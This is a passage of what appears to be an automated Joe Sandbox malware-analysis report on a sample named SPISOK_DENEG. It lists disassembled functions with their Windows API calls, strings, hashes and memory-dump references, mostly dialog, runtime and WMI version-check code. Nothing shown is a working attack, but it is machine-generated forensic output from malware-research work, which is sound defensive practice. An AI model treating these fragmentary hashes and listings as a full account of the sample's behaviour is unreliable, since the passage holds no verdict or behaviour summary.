                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 0bfe27dd009abd61d50280c1eb6e353bcabcbb7ad401454c00dec78667bb64e8
                                                            • Instruction ID: 766fb9f72ec892f5d732150331f3bc7208f2e7e4e68ad79f99a5a00e0e9a2b1d
                                                            • Opcode Fuzzy Hash: 0bfe27dd009abd61d50280c1eb6e353bcabcbb7ad401454c00dec78667bb64e8
                                                            • Instruction Fuzzy Hash: 06017C7A100348BAD7119FB5EC45F9AB7FCFF09710F008426FA45A7190E3B0A965CBA5
                                                            APIs
                                                            • GetLastError.KERNEL32(000D6DDF,00000000,00000400), ref: 000D6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000D6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 73848daf1fbaa5bbba33aeabca5d576a38a7e9c8aa8fbb2a245bc7a3ceedff6b
                                                            • Instruction ID: 67b15ee09450cbd89e3b1eaae3604def4c957eb09ed33d9f541952adda02e5eb
                                                            • Opcode Fuzzy Hash: 73848daf1fbaa5bbba33aeabca5d576a38a7e9c8aa8fbb2a245bc7a3ceedff6b
                                                            • Instruction Fuzzy Hash: 46D0C931385300BFFA510BA18D06F2ABB9DBF45B51F18D405B7A5E84E0CAB59464A629
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001019EF,?,?,00000008,?,?,0010168F,00000000), ref: 00101C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 3632c5a13e5dd59c3440495884aca6394d6e4c28c5e646c957f942dac415ef5e
                                                            • Instruction ID: b3928526dfa80d37f74ba4955fb762ce3309bad750740b5633ceda5a01ba9534
                                                            • Opcode Fuzzy Hash: 3632c5a13e5dd59c3440495884aca6394d6e4c28c5e646c957f942dac415ef5e
                                                            • Instruction Fuzzy Hash: D2B11931610609AFE719CF28C58AB657BE0FF45364F298658E8DACF2E1C379D991CB40
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000EF66A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: ef75938757baea55c7cbb604fdbe5b83418c1b2ed0931ef7712a0fcdfb028547
                                                            • Instruction ID: 364c26ae288a64a60f790e5f956cf4a91c9b266c7d99628c7de84fe356b7c585
                                                            • Opcode Fuzzy Hash: ef75938757baea55c7cbb604fdbe5b83418c1b2ed0931ef7712a0fcdfb028547
                                                            • Instruction Fuzzy Hash: 8951A2B1A0160A9FEB64CF96E9857BEBBF4FB48314F248839C441FB260D3749941CB90
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 000DB16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            Strings
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,000EF3A5), ref: 000EF9DA
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e99185ec5b8fb31c6e93c3a28c467453704b3446c98b9432abe407da06d273f5
                                                            • Instruction ID: 08b8922c94a925b448face6cf1c6e7188d9dcfc71641e5707c6a50e06dfe1948
                                                            • Opcode Fuzzy Hash: e99185ec5b8fb31c6e93c3a28c467453704b3446c98b9432abe407da06d273f5
                                                            • Instruction Fuzzy Hash: 77E17D745083948FC348CF69D8804AABFF1AFCA310F46495EF9C497352C235EA59DBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: 14819c7a0b1483433e86da3990ff9b8d607325c0a494fdc18615db3070b1f01b
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: 039176B02003898FCB24EE76D894BFE77D4EBA1300F50092DFA96A7282DE74A545D752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 89c120978d52929ed58461e25103270051b7ddfe3d7220618bac5281aae5419e
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: DF812AB17043C64FDB34DE6AD8D5BBD37D4AB91304F00092EE9C6AB2C3DA7489858762
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000DE30E
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00111030,00000200,000DD928,00000000,?,00000050,00111030), ref: 000E1DC4
                                                            • _strlen.LIBCMT ref: 000DE32F
                                                            • SetDlgItemTextW.USER32(?,0010E274,?), ref: 000DE38F
                                                            • GetWindowRect.USER32(?,?), ref: 000DE3C9
                                                            • GetClientRect.USER32(?,?), ref: 000DE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 000DE475
                                                            • GetWindowRect.USER32(?,?), ref: 000DE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 000DE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 000DE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 000DE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 000DE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 000DE58D
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 000FCB66
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC71E
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC730
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC742
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC754
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC766
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC778
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC78A
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC79C
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7AE
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7C0
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7D2
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7E4
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7F6
                                                            • _free.LIBCMT ref: 000FCB5B
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FCB7D
                                                            • _free.LIBCMT ref: 000FCB92
                                                            • _free.LIBCMT ref: 000FCB9D
                                                            • _free.LIBCMT ref: 000FCBBF
                                                            • _free.LIBCMT ref: 000FCBD2
                                                            • _free.LIBCMT ref: 000FCBE0
                                                            • _free.LIBCMT ref: 000FCBEB
                                                            • _free.LIBCMT ref: 000FCC23
                                                            • _free.LIBCMT ref: 000FCC2A
                                                            • _free.LIBCMT ref: 000FCC47
                                                            • _free.LIBCMT ref: 000FCC5F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000E9736
                                                            • _wcslen.LIBCMT ref: 000E97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 000E97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000E9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E982D
                                                            Strings
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 000ED6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 000ED6ED
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000ED709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000ED720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000ED734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000ED75D
                                                            • DeleteObject.GDI32(00000000), ref: 000ED764
                                                            • GetWindow.USER32(00000000,00000002), ref: 000ED76D
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            APIs
                                                            • _free.LIBCMT ref: 000F9705
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000F9711
                                                            • _free.LIBCMT ref: 000F971C
                                                            • _free.LIBCMT ref: 000F9727
                                                            • _free.LIBCMT ref: 000F9732
                                                            • _free.LIBCMT ref: 000F973D
                                                            • _free.LIBCMT ref: 000F9748
                                                            • _free.LIBCMT ref: 000F9753
                                                            • _free.LIBCMT ref: 000F975E
                                                            • _free.LIBCMT ref: 000F976C
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: e00556efb0dafd5f01f1974a2c0c54ebc7b06a700439c315a769e9fc614db4a8
                                                            • Instruction ID: 950f9c0f0fa18d338cef890f4d0624ea1137b78b1d2f883942904d5add35e017
                                                            • Opcode Fuzzy Hash: e00556efb0dafd5f01f1974a2c0c54ebc7b06a700439c315a769e9fc614db4a8
                                                            • Instruction Fuzzy Hash: 04B17A7180020DEFCF29DFA4C8819BEBBB5FF04320F14416AEA016BA12D735DA55EB91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D6FAA
                                                            • _wcslen.LIBCMT ref: 000D7013
                                                            • _wcslen.LIBCMT ref: 000D7084
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: e3e3fbfff115b33580639f86f666c320c7432700d07f18d7a618af8f8b1d040f
                                                            • Instruction ID: 2fb5f73c0a68443c58650f241d5e1d3a2208b690476662bf50c536c486c22ae3
                                                            • Opcode Fuzzy Hash: e3e3fbfff115b33580639f86f666c320c7432700d07f18d7a618af8f8b1d040f
                                                            • Instruction Fuzzy Hash: E341D6B1D08348BAEB30E7749D42FEE77AC9F15304F004557FA59A62C3E7756A888631
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 000EB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000EB650
                                                            • SetWindowTextW.USER32(?,?), ref: 000EB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 000EB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000EB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000EB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: c7713995ace0877b89f5e3df3a15036fdf5e757b531db83f086c9bb4637e86a9
                                                            • Instruction ID: e2ae3d6ef72703eb9a89a9b25c7d209532dbe9387f70c64453b4e1ee73da71e7
                                                            • Opcode Fuzzy Hash: c7713995ace0877b89f5e3df3a15036fdf5e757b531db83f086c9bb4637e86a9
                                                            • Instruction Fuzzy Hash: 15212732204244BFD2216F77ED49F7B3BBCEB4AB51F010018F600B69E0CB6699929635
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C85E95ED,00000001,00000000,00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 000EFE1F
                                                            • _com_issue_error.COMSUPP ref: 000EFE48
                                                            • _com_issue_error.COMSUPP ref: 000EFE52
                                                            • GetLastError.KERNEL32(80070057,C85E95ED,00000001,00000000,00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE57
                                                            • _com_issue_error.COMSUPP ref: 000EFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE80
                                                            • _com_issue_error.COMSUPP ref: 000EFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: ec7b105ba44c2eed1a594fa92f3ec0f0b8b5609c37b21c1178ff15a16aad9620
                                                            • Instruction ID: c3d35ee20e631aa7a5127b65b92f8ac08ecafaf4a205ef98edec84fc165b7530
                                                            • Opcode Fuzzy Hash: ec7b105ba44c2eed1a594fa92f3ec0f0b8b5609c37b21c1178ff15a16aad9620
                                                            • Instruction Fuzzy Hash: 7041F871A0024AAFC7109F66CC45BBEBBE9EB48710F20423AF915F7792D774A94087A1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 1605d25193a7358ebf941f42b9874d50dd1d2d1ecc8bbd5118171a8f43edd124
                                                            • Instruction ID: 307805cbe00d7d69259afec62ff45d401dd9177b8e6b0f77d59f38b8758cd7fc
                                                            • Opcode Fuzzy Hash: 1605d25193a7358ebf941f42b9874d50dd1d2d1ecc8bbd5118171a8f43edd124
                                                            • Instruction Fuzzy Hash: 7A714A71B00319EFDB14DFA4C8959AEBBB9FF49710B14015AE552A73A0CB70AE42CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000D93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000D93C9
                                                              • Part of subcall function 000DC29A: _wcslen.LIBCMT ref: 000DC2A2
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • _swprintf.LIBCMT ref: 000D9465
